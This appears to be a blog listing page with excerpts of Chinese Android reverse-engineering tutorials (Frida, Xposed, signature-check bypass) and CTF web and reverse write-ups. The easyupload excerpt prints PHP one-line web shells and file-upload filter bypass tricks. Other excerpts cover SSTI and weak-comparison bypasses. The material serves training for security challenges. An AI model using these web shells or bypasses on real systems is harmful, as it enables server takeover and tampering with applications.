Android逆向9-Frida入门
Android逆向9-Frida入门来自吾爱破解-正己 https://www.52pojie.cn/thread-1701353-1-1.html Frida简介介绍Frida...
Android逆向8-so层逆向知识
Android逆向8-so层逆向知识来自吾爱破解-正己 https://www.52pojie.cn/thread-1701353-1-1.html down.52pojie.cn so加载流程作用:反调试、脱壳、注入等 函数的基本介绍: 函数名 描述 android_dlopen_ext() 、dlopen()、do_dlopen() 这三个函数主要用于加载库文件。android_dlopen_ext 是系统的一个函数,用于在运行时动态加载共享库。与标准的 dlopen() 函数相比,android_dlopen_ext 提供了更多的参数选项和扩展功能,例如支持命名空间、符号版本等特性。 find_library() find_library() 函数用于查找库,基本的用途是给定一个库的名字,然后查找并返回这个库的路径。 call_constructors() call_constructors()...
Android逆向7-Native逆向
Android逆向7-Native逆向来自吾爱破解-正己 https://www.52pojie.cn/thread-1701353-1-1.html NDK(Native Development...
Android逆向6-XPosed
Android逆向6-XPosed来自吾爱破解-正己 https://www.52pojie.cn/thread-1701353-1-1.html Xposed简介Xposed是一款可以在不修改APK的情况下影响程序运行的框架,基于它可以制作出许多功能强大的模块,且在功能不冲突的情况下同时运作。在这个框架下,我们可以编写并加载自己编写的插件APP,实现对目标apk的注入拦截等。 原理: 用自己实现的app_process替换掉了系统原本提供app_process,加载一个额外的jar包,入口从原来的: com.android.internal.osZygoteInit.main()被替换成了:...
Android逆向5-签名校验&smail
Android逆向5-签名校验&smail来自吾爱破解-正己 https://www.52pojie.cn/thread-1701353-1-1.html 了解APK文件签名 了解APK常见校验及校验对抗方法 了解PM代{过}{滤}理和IO重定向 smali语法之赋值 校验 常见的校验有:签名校验(最常见)、dexcrc校验、apk完整性校验、路径文件校验等 APK签名通过对 Apk 进行签名,开发者可以证明对 Apk 的所有权和控制权,可用于安装和更新其应用。而在 Android 设备上的安装 Apk ,如果是一个没有被签名的 Apk,则会被拒绝安装。在安装 Apk 的时候,软件包管理器也会验证 Apk 是否已经被正确签名,并且通过签名证书和数据摘要验证是否合法没有被篡改。只有确认安全无篡改的情况下,才允许安装在设备上。 简单来说,APK 的签名主要作用有两个: 证明 APK 的所有者。 允许 Android 市场和设备校验 APK 的正确性。 Android 目前支持以下四种应用签名方案: v1 方案:基于 JAR 签名。 v2 方案:APK 签名方案...
攻防世界36-fakebook-CTFWeb
攻防世界36-fakebook-CTFWeb没发现什么,随便join发现blog有过滤,dirsearch扫描一下,发现robots.txt,和flag.php(不能直接看),发现源码泄露,下载得源码: 1234567891011121314151617181920212223242526272829303132333435363738<?phpclass UserInfo{ public $name = ""; public $age = 0; public $blog = ""; public function __construct($name, $age, $blog) { $this->name = $name; $this->age = (int)$age; $this->blog = $blog; } function get($url){ $ch =...
攻防世界35-easyupload-CTFWeb
攻防世界35-easyupload-CTFWeb通过各种上传发现,过滤了php后缀和内容中有php的文件 有这几种方式上传一句话木马 123<script language="php">eval($_POST[1]);</script><?php eval($_POST['cmd']);?><?= eval($_POST['cmd']);?> 那么如果过滤php的话只能用最后一种方式 上传时也要注意Content-Type: text/jpg 上传名称后缀为.phtml .phps .php5...
2025 UCSC CTF WriteUp
2025 UCSC CTF wp Reverseeasy_re-ucsc简单异或 1234enc = '''n=<;:h2<'?8:?'9hl9'h:l>'2>>2>hk=>;:?'''for i in range(0,len(enc)): print(chr(ord(enc[i]) ^ 10),end='') flag{d7610b86-5205-3bf3-b0f4-84484ba74105} EZ_debug-ucscdebug能看结果,下断点道最后就行,直接看 123for i in range(0,len(enc)): print(chr(enc[i]),end='') flag{709e9bdd-0858-9750-8c37-9b135b31f16d} simplere-ucsc...
攻防世界34-shrine-CTFWeb
攻防世界34-shrine-CTFWeb123456789101112131415161718192021222324252627import flaskimport osapp = flask.Flask(__name__)app.config['FLAG'] = os.environ.pop('FLAG')@app.route('/')def index(): return open(__file__).read()@app.route('/shrine/<path:shrine>')def shrine(shrine): def safe_jinja(s): s = s.replace('(', '').replace(')', '') blacklist = ['config', 'self'] return...
攻防世界33-lottery-CTFWeb
攻防世界33-lottery-CTFWeb 规则就是2个相同的数字赢5块…. flag是要9990000买到的,初始账户只有20,买一次2块 先注册 看看源码试试 源码中api.php里有buy方法 我么发现了随机生成的win_number[i]呵numbers[i]是弱比较,能不能绕过呢? 如果是输入true肯定跟1,2是==的 抓包看看 改成这 刷钱就行买到了






